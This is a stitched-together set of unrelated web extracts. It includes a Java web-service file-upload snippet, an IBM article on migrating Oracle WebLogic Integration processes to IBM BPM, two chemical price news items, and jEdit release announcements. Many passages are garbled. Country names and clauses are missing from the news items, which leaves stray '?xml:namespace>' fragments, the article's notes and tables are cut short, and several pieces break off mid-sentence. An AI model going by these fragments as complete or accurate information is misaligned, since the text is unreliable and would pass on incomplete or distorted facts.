Main class. Main main public static void main(String[] args) { URL url; byte[] bytes = new byte[5000]; try { url = new URL(""); QName qname = new QName("", "DocumentImplService"); Service service = Service.create(url, qname); DocumentInt server = service.getPort(DocumentInt.class); File file = new File("E:/Documents/view_pdf.pdf"); bytes = new byte[(int) file.length()]; try { FileInputStream fileInputStream = new FileInputStream(file); fileInputStream.read(bytes); } catch (FileNotFoundException e) { System.out.println("File Not Found."); e.printStackTrace(); } catch (IOException e1) { System.out.println("Error Reading The File."); e1.printStackTrace(); } server.upload(bytes); } catch (Exception e) { e.printStackTrace(); } } The above function reads a file from E:/Documents/view_pdf.pdf and converts the file to a byte array. This byte array is then used to invoke the upload function. On executing the client, we will get a file created in the location which we specified in upload function..
http://www.codeproject.com/Articles/216081/Solving-real-world-problems-using-Webservice
CC-MAIN-2015-06
en
refinedweb
Introduction Oracle unveiled its roadmap for BEA acquisition's products back in July 2008. During the webcast, Oracle Senior VP Thomas Kurian explained that Oracle has divided BEA’s products into three groups (strategic1, continue and converge2, and maintenance3). He then assigned each of the BEA products to one of these groups. WebLogic Integration (WLI), was assigned to the "continue and converge" group; it was no longer listed as a strategic product. This means that incremental extensions will be made to WLI 10gR3 and it will be converged with the Oracle BPEL Process Manager. In fact, extended support has already ended for many of the earlier WLI releases. For more information, refer to Oracle Information Driven Support: Lifetime Support Policy. Because WLI is no longer a strategic product at Oracle, all WLI customers will eventually be forced to migrate their business processes and applications from WLI to an alternative platform, such as Oracle BPEL Process Manager or IBM BPM Advanced. If you are one of those Oracle customers that are lucky enough to be running on WLI 10gR3, you can defer that decision for a few years because the extended support for 10gR3 doesn't end until Jan 2017. But if you are like most Oracle customers and are running your business processes on earlier versions of WLI, you will need to make a decision soon. In making such a decision, there are two options to consider. Specifically, you can: - Migrate to WLI 10gR3 now and migrate to an alternative platform in a few years. - Migrate to an alternative platform now and avoid the cost of migrating to 10gR3. If you decide to migrate to an alternative platform, one option is Oracle BPEL Process Manager, which provides common infrastructure services to create, deploy, and manage BPEL business processes. Oracle has tooling to assist in the migration of WLI business processes and applications. However, another strategic replacement product for WLI is IBM BPM Advanced, which is also a fully functional BPEL solution with tools to assist in the migration from WLI, as illustrated in the comparison below. Notes: 1. 2. 3 Maintenance — These products were already declared by BEA prior to the acquisition to be at the ends of their lives. Oracle will honor BEA’s maintenance contracts on these products by supporting them for at least five years. Table 1. Feature comparison of IBM BPM Advanced V8 and Oracle Weblogic Integration 10gR3 Series overview This series of articles describes the overall process and supporting tools for exporting BPEL and supporting artifacts from WLI to IBM BPM Advanced. This tool-assisted approach enables you to produce a complete replica of your WLI application running on the IBM BPM Advanced platform. You can perform manual editing for optimum use of the new features provided by the platform. To obtain the migration tools described in this series, please contact the authors directly. The series does not present a feature by feature comparison of Oracle BPEL Process Manager and IBM BPM Advanced. Contact your IBM sales representative for such a comparison. For this series, it is sufficient to say that IBM BPM Advanced is a superset of the features and functions in WLI, as illustrated in Table 2, and is therefore a viable alternative to WLI. The articles in this series are as follows: - Part 1: "Introduction" describes the tools and techniques that have been successfully used to migrate WLI business processes and associated artifacts to BPM. This article covers the following: - Artifacts describes WLI artifacts that make up the business processes. - Tooling describes the tools that can be used to migrate these artifacts. - The migration process describes the high-level process of exporting and migrating these artifacts. - Part 2: "Data Transformations" describes the different transformations that may be required to reuse business logic that is encapsulated inside the WLI artifacts. - Part 3: "Migrating WLI Controls to IBM BPM" shows you how to convert WLI Controls to Service Component Architecture (SCA) components that can be run on IBM BPM. - Part 4: "Migrating WLI processes (JPDs) to IBM BPM" pulls all of the pieces together by demonstrating the migration of a business process that runs on Oracle WLI to one that runs on IBM BPM. The issues discussed in this series apply directly to the migration of applications from Oracle WebLogic Integration V8.x, V9.x, and V10.x to IBM BPM Advanced V7.0, V8.0, and V8.5. Most of the information here also applies to earlier versions of WLI. Artifacts This section describes the artifacts that make up a WLI application. - JPD - WLI represents workflows in files with a .jpd extension. A JPD is a Java file, with some extra Javadoc annotations that define the orchestration logic. - WSDL - WLI uses WSDL to define the interface to the JPD and its partners. - XQuery - WLI represents XQueries in files with an .xq extension. - DTF - Data Transformation File (DTF) is a WLI control that can be invoked by a JPD. DTF files have an extension of .dtf. DTF files contain definitions of a data transformation that can be invoked from a JPD. DTF controls generally retrieve some data from an XML document by invoking XQuery (which uses XPath to address specific parts of the XML document). - JCS - Java Control Source (JCS) files are Java components that developers write to provide business logic and access other controls. These Java controls have an extension of .jcs. They are invoked by JPDs, may have per-process state, and may also access collaborators on behalf of their JPD. - JCX - Java Control Extension (JCX) files act as wrappers for Java EE resource adapter modules and have an extension of .jcx. They are invoked by JPD callouts. - XMLBeans - WLI uses XMLBeans to generate Java types from WSDL and XSDs. These Java types are used as parameters to many of the aforementioned WLI artifacts. Tooling This section describes the installation and configuration of the migration tools. BPEL 2.0 Importer Background The BPEL 2.0 Importer is an Eclipse plug-in for importing WS-BPEL 2.0 process definitions into IBM Integration Designer V8.0 or V7.5 (or WebSphere® Integration Developer V7.0) so they can be run on IBM BPM. Although IBM BPM supports the majority of WS-BPEL 2.0, some of the language elements in BPM still use the syntax defined in the preliminary BPEL4WS 1.1 specification. The BPEL 2.0 Importer handles these language differences by running a series of XSLT transformations. It even allows you to add new XSLT transformations if required. Installation Follow the installation instructions for the BPEL 2.0 Importer described in the developerWorks article Importing WS-BPEL 2.0 process definitions. BPEL 2.0 Importer – WLI customization Background As mentioned, the BPEL 2.0 Importer was designed to import WS-BPEL 2.0 language elements and extended to handle differences. This extensibility feature is quite useful because there are parts of the WLI BPEL that are nonstandard. Thus, IBM has created a number of additional XSLT transformations to account for the required changes between the WLI BPEL and BPM BPEL. These conversions are syntactic in nature and preserve the runtime semantics. Some of the additional transformations are: - Convert BPEL v2.0's "if-else/if-else" constructs to v1.1 "switch-case" constructs. - Convert <empty>, <scope>, and <sequence> nodes under the main "if" element. - Convert "condition" attributes, nodes, or both. - Convert XPath or Java snippet conditions. - Convert <empty> nodes with a <jpd:javacode> child to an <invoke> node. - Refactor <jpd:javacode> nodes to <wpc:javaCode> nodes. - WLI's <jpd:javacode> elements wraps Java snippet codes in a method block with method name and curly braces. Those are stripped for BPM Java Snippet constructs. - Add TODO comments in the Java code to remind developers to review and refactor the Java codes to be BPM or WebSphere Process Server compatible. - Remove incompatible XQuery related nodes. - Attempt to give a unique name to <scope>, <sequence>, <assign> nodes. - Convert variables with initialized values. (Integer and String only so far). - Refactor PartnerLinkType. Installation Once the BPEL 2.0 Importer has been installed, you can import BPEL as described in the BPEL plug-in documentation. When BPEL process definitions are imported using the BPEL 2.0 Importer, these process definitions may contain XPath expressions that call XPath functions provided by WLI. If so, the BPEL 2.0 Importer leaves these XPath expressions unchanged. When the processes are in IBM Integration Designer, the calls to these WLI proprietary XPath functions are marked as errors as these functions are unknown in the IBM BPM environment To handle these WLI proprietary XPath expressions, we have implemented about 15 XPath functions that we have found in WLI BPEL processes. These XPath expressions have become a base for a growing repository of XPath function implementations that can be reused for WLI migrations. These XPath function implementations are made known to the IBM BPEL 2.0 Importer by replacing the XSLT file that came with the BPEL 2.0 Importer. The location of that file is: {IID_Install_Dir}\p2\cic.p2.cache.location\plugins\com.ibm.wbit.bpel20.importer_{Version#+Release_Date}\xslt\ImportBPEL20.xsl The migration of WLI proprietary XPath expressions will be described in more detail in Part 3 of this series. OpenESB BPEL 1.1 to 2.0 transform tool Background The BPEL 1.1 to 2.0 transform tool is a third-party tool that can be downloaded to migrate your BPEL process from 1.1 to 2.0. You may need this tool if you are running earlier versions of WLI that only support BPEL 1.1 exports. This tool can be at the Open ESB web site. Installation The BPEL transformation tool is an executable JAR. Example usage is: java –jar transform.jar <input folder> <output folder> Note: <input folder> should contain any referenced BPEL, XSD, or WSDL files. WLI migration utilities This section describes the migration utilities available to help you migrate your WLI applications to IBM BPM. JCS migration utility The JCS Migration Utility helps migrate JCS (Java Control Source) to Java Objects that can be run on IBM BPM. In WLI, JSCs are essentially Java implementations with a .jcs extension. This utility automatically modifies JSC files and their corresponding interfaces, and modifies them into standard Java Objects that can be used by BPM. This utility automatically migrates JSCs by: - Changing the extension from .jsc to .java - Modifying the interface and implementation to remove any proprietary APIs - Creating an SCA implementation that can be used by BPM Note: The SCA implementation references some conversion libraries that we developed to handle the data transformations between XMLBeans and Service Data Objects. These libraries are also included in the project classpath. The utility is an executable JAR that can be run at the command line. Example usage is: java –jar transformationUtil.jar JCStoJAVA <location of jcs>.jcs For example, suppose that <location of jcs> had the files: - Example.java – Interface file - ExampleImpl.jcs – Implementation of Example, and business logic After running the utility you would have: - Example.java – New interface with proprietary APIs removed - Example.java.old – Original Java interface for reference (this can be discarded) - ExampleImpl.java – Implementation of Example.java with proprietary APIs removed and some other changes - ExampleSCAImpl.java – An SCA implementation that does some data transformation and calls the corresponding methods in ExampleImpl.java. This can be used in BPM - ExampleImpl.jcs – The unchanged jcs file (this can be discarded) DTF Migration Utility The DTF Migration Utility assists in the migration of WLI DTF (Data Transformation Files) to Java Objects that can be run on IBM BPM Advanced. In WLI DTF files are used to help execute XQuery files for performing data transformations. References to the XQuery files are defined as Java doc comments above each method in the DTF. The DTF migration utility automatically modifies DTF files by converting them to standard Java Objects that can be used by BPM. This utility automatically migrates the DTFs by: - Changing the extension from .dtf to .java - Removing the abstract definition from the class name - Changing the abstract methods to standard methods, and modifying the methods to execute the corresponding XQuery file that was defined within the comments - Modifying the class by removing any WLI proprietary APIs - Modifying the return type of the methods to return a standard DataObject The tool is an executable JAR that can be run at the command line. Example usage is: java –jar transformationUtil.jar DTFtoJAVA <location of dtf>.dtf XQuery Migration Utility The XQuery Migration Utility automatically migrates the XQuery files that run on WLI so that they can be executed in BPM. These XQuery files were written specifically for execution in DTF files, and a few modifications need to be made to make them standard. They were migrated by: - Adding namespace declarations - Adding ";" at the end of some lines The tool is an executable JAR that can be run at the command line. Example usage is: java –jar transformationUtil.jar XQueryTranformation <location of xquery>.xq The migration process This section gives a high-level overview of the major steps performed during the migration from WLI to IBM BPM, as illustrated in Figure 1. These steps will be described in more detail in future parts of this series. Figure 1. The migration process Preparation During the preparation stage, the required software is installed (it is assumed that WLI is already installed), which includes: - IBM Integration Designer V8.0 - IBM BPM Advanced V8.0 - BPEL 2.0 Importer - OpenESB BPEL 1.1 to 2.0 Transform Tool (Optional) - JCS Migration Utility - DTF Migration Utility - XQuery Migration Utility Extract artifacts In this stage of the migration process, the following artifacts are extracted or exported from the WLI workspace: - WSDLs and web services (such as JWS) - Control implementations (such as JCS and JSX) - Data transformations (such as DTF and XQ) - XML Schemas (XSD) - EARs and Java Source Files Export BPEL v2.0 If you are using WLI v10.x and have access to JDeveloper, you can export the JPD processes as BPEL v2.0 and avoid having to perform the transformation in the next section. If you are using WLI v7.x, v8.x or v9.x you must export the JPD processes as BPEL v1.1, as described in the next section. Export BPEL v1.1 and transform to BPEL v2.0 If you are using WLI v7.x through v9.x, you don't have the capability to export the JPD processes as BPEL 2.0 and therefore must first export the JPD processes as BPEL v1.1 by doing the following: - Use the Export BPEL option in WLI Workshop to export the JPD process as BPEL. - Copy the BPEL, WSDL and XSD files in to a temporary directory. - Use the OpenESB BPEL 1.1 to 2.0 Transform Tool to convert the BPEL to BPEL v2.0. Import artifacts into Integration Designer The next stage of the migration process is to import the WLI artifacts into IBM Integration Designer using the BPEL 2.0 Import wizard in the Import dialog. Migrate XMLBean objects XMLBeans (based on the Apache XMLBeans) is the default XML data construct and access technology leveraged by WLI processes. Many existing WLI artifacts, WLI controls, Java snippets and Java utilities contain XMLBean objects. Given that some of the aforementioned artifacts have XMLBeans deeply embedded and would be too costly to re-code, you can follow these steps to bridge between XMLBeans and SDO. - Generate XMLBeans Java objects from existing XSD schemas using Apache XMLBeans libraries. - Import generated XMLBeans into the Integration Designer workspace. - Locate existing code where XMLBeans are used. - Use WLI migration utilities to convert between XMLBeans and SDO. (This is a two step conversion process: XMLBeans ↔ XML String ↔ SDO.) This process will be described in more detail in Part 2 of this series. Migrate the WSDL Two WSDL files are generated for each exported WLI JPD BPEL flow. - One provider WSDL defines the interface for the JPD process. - One control WSDL defines the interface for all the external services the JPD process invokes. This WSDL has the "_ctrl" suffix in the file name. After the WSDL files are imported in to Integration Designer, a number of changes may be required: schemaLocationsometimes need correction. - Some types will have to be modified (for example, Exceptions, Objects, xsd:base64binary). - The provider WSDL may have a missing types definition. This can be imported from XSD or copied from the control WSDL. - Some interfaces in the control WSDL files may be replaced by the original WSDL files or other exported WSDL files (e.g. web service controls, process controls, and so on.) - PartnerLink information may need to be updated. This process will be described in more detail in parts 3 and 4 of this series. Migrate XQuery transforms WLI uses XQuery language to transform XML messages. Such XQuery transformations are commonly used in WLI JPD processes. Each XQuery is saved in a .XQ file and is invoked using a WLI control (saved in a .DTF file). IBM BPM does not natively support XQuery transformations (it supports transformations using XSLT or Java) and although manually converting the XQuery to XSLT or Java is an option, in some cases it might be easier to use the existing XQuery transformations by invoking the WebSphere Thin Client for XML, which supports XQuery 1.0. To use the XQueries with the WebSphere Thin Client for XML, do the following: - Run WLI Migration Utilities to transform .DTF to .java code that leverages the Thin Client for XML. - Run WLI Migration Utilities to transform .XQ files to be compatible with the thin client. - Create Java SCA component using the converted .DTF Java implementation. This process will be described in more detail in Part 2 of this series. Migrate Custom Controls WLI Custom Controls are externalized Java classes exposed as a WLI control, which are invoked by WLI JPD processes. These Custom Controls often implement complex functionality that is not provided natively by WLI or IBM BPM and may have a large code base that is impractical to re-implement during migration. Complete the following steps to migrate the Custom Control to IBM BPM while preserving as much of the custom code as possible: - Run WLI Migration Utilities to transform Custom Control .JCS files to POJOs. - Create a Java SCA component using the converted .JCS Java implementation. - Perform any manual modifications necessary to correctly convert data types in the converted .DTF Java codes. This process will be described in more detail in Part 3 of this series. Migrate Built-in Controls WLI built-in controls are pre-built integration components that allow the WLI JPD process to interact with external enterprise systems. These built-in controls are exposed through a Java Control Extension (.JCX) file that contains the interface and configuration data for the built-in control. Some built-in controls can be replaced by embedded IBM BPM business process features (such as Process Control with Invoke, Timer Control with Expiry or Wait, and so on), some can be replaced by WebSphere Adapter and some simply require re-implementation. This process will be described in more detail in Part 3 of this series. Migrate the business processes This step of the migration process is focused on making the required changes to the BPEL process that was exported from WLI to ensure that it is ready to run on IBM BPM. Some of the required changes are: - Conversion of fault handlers - Conversion of parallel "or" constructs - Setting transaction properties - Conversion of Java snippets - Modification of partner references This process will be described in more detail in Part 4 of this series. Assemble and wire the components Once the BPEL process and other implementation artifacts have been migrated to IBM BPM, you need to complete the assembly diagram by creating SCA components and wiring them to the BPEL process. Before the application can be deployed, you must create any required J2EE resources on the IBM BPM server and disable the inter-transaction cache. This process will be described in more detail in Part 4 of this series. Deploy and test The final stage of the migration process is to deploy and test the new IBM BPM process using the integration test client in Integration Designer. If there are any unimplemented components or unwired references in the process, they are automatically emulated. This means your process does not need to be complete before you can start testing. This process will be described in more detail in Part 4 of this series. Conclusion The tools and migration process described in this series of articles were developed over the past year to ease the process of migrating Oracle WLI applications to IBM BPM Advanced. These tools have successfully been used at customer sites. To obtain these tools, contact the authors or your IBM sales representative. Resources - Importing WS-BPEL 2.0 process definitions Using the WS-BPEL 2.0 standard with IBM Integration Designer - Oracle WebLogic Integration BPEL Import and Export User Guide 10g Release 3 (10.3.1) - Oracle Lifetime Support Policy - Oracle Fusion Middleware - IBM Business Process Manager Advanced product information - IBM Business Process Manager Information Center - IBM Software Services for WebSp.
http://www.ibm.com/developerworks/bpm/library/techarticles/1306_vines/1306_vines.html
CC-MAIN-2015-06
en
refinedweb
20 January 2012 03:33 [Source: ICIS news] SINGAPORE (ICIS)--Saudi Aramco Mobil Refinery (Samref) has sold by tender 230,000 barrels of naphtha for loading from Yanbu in ?xml:namespace> The loading dates are 5-7 March, they added. The cargo was done at a premium of around $20-22/tonne (€15-17/tonne) to ($1 = €0
http://www.icis.com/Articles/2012/01/20/9525519/saudis-samref-sells-230000-barrels-naphtha-for-early.html
CC-MAIN-2015-06
en
refinedweb
24 February 2012 15:59 [Source: ICIS news] LONDON (ICIS)--Bullish sentiment in the European acrylonitrile (ACN) market continues to take hold on the back of concerns over raw material shortages and strong development in ?xml:namespace> February business is done and European manufacturers insist they will not sell below $2,100/tonne (€1,575/tonne) CIF (cost, insurance, freight) WE (western Europe) for March, up from $1,700–1,800/tonne at the start of the year. One buyer said that it is still getting offers in the $2,000s/tonne for March shipment but others concede that values will be above $2,100/tonne CIF WE. An end-user in Indeed, rumours were heard of a deal between a European manufacturers are looking to catch up with the prices being seen in other regions. Northeast Asian figures are heard at around $2,150–2,200/tonne CFR, amid a spate of plant shutdowns. In addition, Ineos has had to scale back ACN production at its 300,000 tonne/year plant in Cologne because of problems with upstream propylene availability. The Switzerland-headquartered petrochemical firm declared force majeure on propylene supplies from the German site after a leak on the superheater forced the No.4 cracker to shut down at the end of last week. Initial indications suggest it is likely to be off line for around 21 days. Ineos is therefore trying to supplement the propylene shortfall on the spot market, and in the meantime has been forced to limit ACN production, a company source said. European spot ACN prices are now pegged at $2,080–2,110/tonne CIF WE. ($1 = €0.75)
http://www.icis.com/Articles/2012/02/24/9535837/europe-acn-prices-continue-ascent-on-feedstock.html
CC-MAIN-2015-06
en
refinedweb
You can subscribe to this list here. Showing 7 results of 7 Hello everybody, I am leaving New Zealand on the 29th June. I will be in Australia until the 20th July. During this time I will have e-mail access, however I will not be doing any jEdit development. On the 21st July, I am going to Canada. Once I settle in, I will resume jEdit development. Before I leave I will release a new version of the FTP plugin, and maybe a new version of the XML plugin as well. -- Slava Pestov jEdit 4.1pre2 is now available from <>. Thanks to Alexander Maryanovsky and Gerd Knops for contributing to this release. + Editing Changes: - The 'Smart Home/End' setting has been split into two separate settings, one for Home and one for End. - Made behavior of mouse in gutter more customizable. (Gerd Knops) - Added option to make double-click drag treat each non-alphanumeric character as one word. (Gerd Knops) - Added an option to not hide the final end of line character of a buffer. + Syntax Highlighting Changes: - Syntax rules can now specify the AT_WHITESPACE_END attribute. If this is set to TRUE, then the rule will only match if it is the first non-whitespace text in the line. - Fixed minor highlighting problem with properties mode. + File System Browser Changes: - Multiple files can now be selected in the stand-alone browser; right-clicking no longer deselects all but the clicked file. - Added 'Open in New Split' command to the right-click menu that splits the view and opens the selected file in the newly created text area. - Right-click menus in the 'Open File' dialog box now contain menu items for opening files in new views and new splits. - File->Open With Encoding menu replaced with an 'Encoding' menu in the file system browser's 'Commands' menu. + Scripting Changes: - 'scriptPath' BeanShell variable is set to the macro file path while a macro or startup script is executing. - Startup scripts can now be written in any language supported by a registered macro handler; so you can put Python scripts in the 'startup' directory if you have the JythonInterpreter plugin installed, for example. - Slight performance improvement when invoking editor actions. + Miscellaneous Changes: - The HyperSearch feature no longer blocks the GUI while listing a directory (which could take some time). - New 'broken image' icon shown in place of tool bar buttons whose icons cannot be located. - Improved popup menu positioning code. - jEdit.get{Integer,Double}Property and Buffer.getIntegerProperty() no longer barf if the property contains leading or trailing whitespace. - Added View->New Plain View command that opens a new view without toolbars or dockables. This can be useful for opening up a quick window for taking notes, etc. - File system browser color regexps are now case-insensitive. - Each dockable window now has a <name>-float action that opens a new instance of that dockable in a few floating window (regardless of the docking status of the window). These commands do not appear in the menu bar, however they can be added to the context menu and tool bar, or bound to keystrokes. + Bug Fixes: - Fixed default install path settings in installer when running on Unix. Now, instead of checking for a user name of "root", it checks if the appropriate subdirectories of /usr/local are writable. - When evaluating BeanShell expressions, the standard view/buffer/editPane/textArea variables would not be unset when the expression finishes executing. - The text area did not get initial focus if there is a window docked in the left or top part of the view, and the 'tip of the day' was switched on. - Removed debugging messages from PanelWindowContainer.java. - Fixed bottom tool bar layout problem. - Image shown in 'welcome to jEdit' page in help was not being installed by the installer. - Fixed a bug in the folding code that could be triggered by switching to indent fold mode, collapsing some folds, switching to explicit fold mode, then switching back to indent fold mode again. - The view's minimum size was rather large, this caused problems while trying to resize it if the option to decorate window borders using the Swing L&F was enabled. - 'Expand Fold Fully' command didn't work. - The 'gutter bracket highlight' setting in the Color option pane didn't work. - Fixed possible ClassCastException if a 'paste previous' string started with the text "<html>". Swing has a weird feature where any text label beginning with <html> is rendered using the Swing HTML engine, and this would trip it off. - HyperSearch inside a selection did not handle ^ and $ in regular expressions correctly on the first or last line of the selection. - Insertion of { and } in C-like modes can now be undone in one step. - Another indentPrevLine regexp fix. (Alexander Maryanovsky) + API Changes: - It is no longer necessary to define labels for dockable window -toggle actions. The label is now automatically created by appending "(Toggle)" to the non-toggle action's label. - Old-style dockable window API no longer supported; the following symbols have been removed: EditBus.addToNamedList() method EditBus.removeFromNamedList() method EditBus.getNamedLists() method CreateDockableWindow class DockableWindow interface -- Slava Pestov jEdit 4.1pre1 is now available from <>. This is the first "real" release since 4.0final -- lots of new features here. Please tell me what you think of them.+ Thanks to Alexander Maryanovsky, Alfonso Garcia, Claude Eisenhut, Joseph Schroer, Kris Kopicki, Steve Snider and Thomas Dilts for contributing to this release. + Editing Changes: - Improved rectangular selection. It now does the right thing with hard tabs, and the width of the selection is no longer limited to the width of the last line. A new 'Vertical Paste' command has been added (it behaves in a similar manner to the 'Virtual Paste' macro, which has now been removed). When inserting text into a rectangle, the inserted text is left-justified with spaces. The quick copy feature has been extended to support this -- a Control-middle click vertically pastes the most recently selected text. - Fixed auto-indent behavior when entering constructs like: if(foo) bar(); baz(); in Java/C/C++/etc modes. Previously the 'baz();' would get an unnecessary level of indent, requiring it to be removed manually. (Alexander Maryanovsky) - Added an option to the 'Text Area' pane to implement "standard" previous/next word behavior, like that in a lot of other programs (next word moves caret to start of next word, instead of end of current word; previous word moves caret to end of previous word, instead of start of current word). You might remember I implemented this behavior for a little while in the 4.0 pre-releases, but now it's back as a configurable option. (Alexander Maryanovsky) - Added a few extra key bindings for Windows users: S+DELETE bound to cut C+INSERT bound to copy S+INSERT bound to paste - Optimized the several parts of the buffer code; this should make 'Replace All' and similar edit-intensive tasks much faster. + Search and Replace Changes: - HyperSearch now respects rectangular selections. 'Replace All' already supported rectangular selections. - Directory search is now VFS-aware; however it shows a confirm dialog before doing a search on a remote filesystem. If your VFS is not affected by network latency, you can have the getCapabilities() method return the new LOW_LATENCY_CAP capability. - Tool bars no longer take up the full width of the view. This saves some screen space. - Clicking 'Cancel' or closing the search and replace dialog box no longer shows warnings about empty filesets, etc. + Syntax Highlighting Changes: - More intelligent highlighting of numbers. Instead of hard-coded heuteristic that only worked for C-like languages, numbers are now highlighted as follows: - A keyword consisting of only digits is automatically marked with the DIGIT token type. - If it has a mix of digits and letters, it is marked as DIGIT of it matches the regexp specified in the rule set's DIGIT_RE attribute. If this attribute is not set, then mixed sequences of digits and letters are not highlighted. - In Java mode, for example, the default value of this regexp is "(0x[[:xdigit:]]+|[[:digit:]]+)[lLdDfF]?". - EOL_SPAN elements can now have DELEGATE attributes. - SEQ elements can now have DELEGATE attributes. If specified, this rule set will be swapped in after the text matched by the sequence rule. - Delegates to rulesets with TERMINATE rules should work now. - IGNORE_CASE attribute of KEYWORDS rule removed. This value is now the same as the IGNORE_CASE attribute of the parent RULES tag. - WHITESPACE rule no longer necessary in mode definitions. - It is no longer necessary to define <SEQ TYPE="NULL"> rules for keyword separator characters. Now, any non-alphanumeric character, that does not appear in a keyword string or the "noWordSep" buffer-local property is automatically treated like it had a sequence rule. - Added FORTRAN syntax highlighting (Joseph Schroer) Added Interilis syntax highlighting (Claude Eisenhut) Updated PL-SQL mode (Steve Snider) Updated NetRexx mode (Patric Bechtel) - HTML and related edit modes now correctly highlight sequences like: <SCRIPT LANGUAGE="JavaScript">...</SCRIPT> <SCRIPT ... whatever ...>...</SCRIPT> Previously only JavaScript between <SCRIPT> and </SCRIPT> was highlighted. A similar change has been made for <STYLE> tags. - Improved loading time of plain text files if 'more accurate syntax highlighting' is on. + User Interface Changes: - Status bar looks somewhat different now, and shows the word wrap mode and line separator status. - The search bar commands now show the search bar if it is hidden. Search bars that come into existence as a result of this have an extra close box button on the right. Pressing ESCAPE in the text field or clicking the button hides the search bar. I have renamed the search bar setting in the General option pane to "Always show search bar", and made it be switched off by default. You can revert to the old behavior simply by switching this setting back on. - The text color and style used to show the "[n lines]" string can now be set independently of the EOL marker color. - Plugin manager window can be closed by pressing Escape. - Open buffers are shown with a different icon in the file system browser. - 'I/O Progress Monitor' window is dockable now. - Added two new sub-menus to the Utilities menu, 'jEdit Home Directory' and 'Settings Directory'. These two work in a similar fashion to the 'Current Directory' menu. Also the 'Current Directory' menu (and these two new menus) now also lists directories; selecting a directory menu item opens it in the file system browser. - Moved BeanShell evaluation commands from 'Utilities' to 'Macros' menu, rearranged 'Edit' menu. - New splash screen, about box, and tool bar icons. (Kris Kopicki) - Added ColorWellButton control. Under Mac OS X, changing the background color of a JButton doesn't work if the MacOS Adaptive look and feel is in use... so I wrote a custom control. It looks better and eliminates duplicated code anyway. Plugin developers, please use this instead of the widely-copied and pasted JButton trick. (Kris Kopicki) - Added RolloverButton control. Use this instead of the JToolBar "isRollover" client property (which only works in the Metal L&F unless you're running Java 2 version 1.4). (Kris Kopicki) + OS-specific Changes: - MacOS plugin version 1.2.1 adds an option pane with a few settings, and some bug fixes and cleanups. (Kris Kopicki) - When running on MacOS, the roots: filesystem now lists all disks mounted under /Volumes. (Kris Kopicki) - On Unix, the installer now defaults to installing in the user's home directory when running as a non-root user. + Miscellaneous Changes: - WheelMouse plugin integrated into core -- no need to install a separate plugin to get wheel mouse scrolling under Java 2 version 1.4. - Added SOCKS proxy support. This option will help people trapped behind a Microsoft Proxy Server configured to use NTLM authentication. Normal HTTP connections through the proxy would not be possible since Java does not implement this proprietary protocol; however a little known fact is that MS Proxy Server also usually runs a SOCKS service that does not require a password. (Alfonso Garcia) - BeanShell 1.2b6 included. Changes since 1.2b5 are: -. - Exposed bsh.BshMethod and added a public invoke() method. - Added getMethods() method to namespace to enumerate methods. The fact that BshMethod is now public has facilitated optimizations which improve performance of BeanShell search and replace. - Updated printing code (Thomas Dilts) - Uses Java 2 version 1.4 print dialogs when running on that Java version - Performs printing in a background thread - Documentation is now generated using DocBook-XSL 1.51.1 stylesheets. + Bug Fixes: - Select Open File; press Enter first; then choose a file to open. Bang, an error message. Now fixed. - When closing a file with unsaved changes, the file will now stay open if the save failed. Previously it would be closed and the unsaved changes would be lost forever. - If 'Keep Dialog' was off, the search dialog would close, even after an unsuccessful HyperSearch. This was inconsistent with the bahavior for normal searches, where an unsuccessful match did not close the dialog (so you could correct the search string easier). - The 'initially collapse folds with level' setting was not being honored when reloading files. - A few printing bugs fixed. (Thomas Dilts) - Workaround for views not being brought to front on windows. This workaround minimises and then restores the view, so a minimise animation might be visible for a brief period of time. However, there is no other way of fixing this. (Alexander Maryanovsky) - Dynamic menus (Recent Files, etc) did not work under MacOS X if the menu bar was at the top of the screen. Note that this does not solve the other problem with having the menu bar there, namely keyboard shortcuts not being displayed. For now, leave the menu bar inside the frame for best results. (Kris Kopicki) - Fixed silly windows backup saving bug. - Fixed minor problem when Control-clicking characters in the text. - Middle mouse button drags now work if there is an existing selection. + API Changes: - Two methods added to jEdit class: getDoubleProperty() setDoubleProperty() - Removed unused TextUtilities.findMatchingBracket(Buffer buffer, int line, int offset, int startLine, int endLine) method. - New ViewUpdate.EDIT_PANE_CHANGED message added; it is sent when a different edit pane in a split view receives focus. - EBMessage.veto(), isVetoable() methods and EBMessage.NonVetoable class deprecated. - Removed old text area highlighter API, old buffer folding API. - Removed BufferUpdate.ENCODING_CHANGED, FOLD_HANDLER_CHANGED messages; replaced with generic BufferUpdate.PROPERTIES_CHANGED. - MultiSelectStatusChanged message removed. - Buffer.markTokens(int lineIndex) deprecated; use Buffer.markTokens(int lineIndex, TokenHandler tokenHandler) instead, with one of the available TokenHandler implementations from org.gjt.sp.jedit.syntax. The tokenizer now behaves differently with respect to whitespace. Tab characters are always put into separate tokens with type Token.TAB; other whitespace gets token type Token.WHITESPACE. - Added new jEdit.getActiveView() method. - VFS file chooser now supports a new 'CHOOSE_DIRECTORY_DIALOG' mode. - Buffer.getRuleSetAtOffset() method is now public. -- Slava Pestov jEdit 4.0.3 is now available from <>. This fixes a showstopper bug in jEdit 4.0.2. Everyone should upgrade. Note that I have now made unified diffs from 4.0 to 4.0.2 and from 4.0.2 to 4.0.3 available. * Version 4.0.3 + Bug Fixes - Added missing check for control key being down in text area mouse handler. + API Changes - Buffer.getRuleSetAtOffset() method is now public. Hello jEdit users- This evening, I have added the latest batch of new plugin releases to Plugin Central. The batch includes one new addition (CheckStylePlugin 0.1 by Todd Papaioannou) and six updates to plugins already on Plugin Central. * CheckStylePlugin 0.1: initial Plugin Central release; CheckStylePlugin is a wrapper around the CheckStyle program that allows you to check your code for adherence of deviation from a Coding Standard; requires jEdit 4.0, ErrorList 1.2, and JDK 1.3; includes CheckStyle 2.2 and ANTLR (checkstyle-all-2.2.jar) * JavaRefactor 0.0.3: added the ExtractMethod refactoring; updated for jEdit 4.0; requires jEdit 4.0pre1 and JDK 1.3; includes RECODER * JSwatPlugin 1.2.0: updated for JSwat 2.4 and JPDA; requires jEdit 4.0pre7, CommonControls 0.2, and JDK 1.4; includes JSwat 2.4 * Lazy8Ledger 1.31: change from 2 digit to 3 digit version number; numerous serious bugs fixed that showed up if you used Java 1.3 instead of Java 1.4 (these bugs prevented the use of Lazy8Ledger almost entirely); after creating a new company and adding default accounts, the name of the company was wrong (fixed); if you used Java 1.3 instead of Java 1.4 then the database backup that should happen when you exit Lazy8Ledger didn't work (fixed); requires jEdit 4.0pre8, BufferTabs 0.7.6, InfoViewer 1.1, and JDK 1.4 * MementoPlugin 0.5.1: fixed layout problems; requires jEdit 4.0final and JDK 1.4 * NetRexxJe 0.07: added source code navigator; removed toolbar; switched to standard icons; other GUI changes; classpaths stores in jEdit history file instead of property file; requires 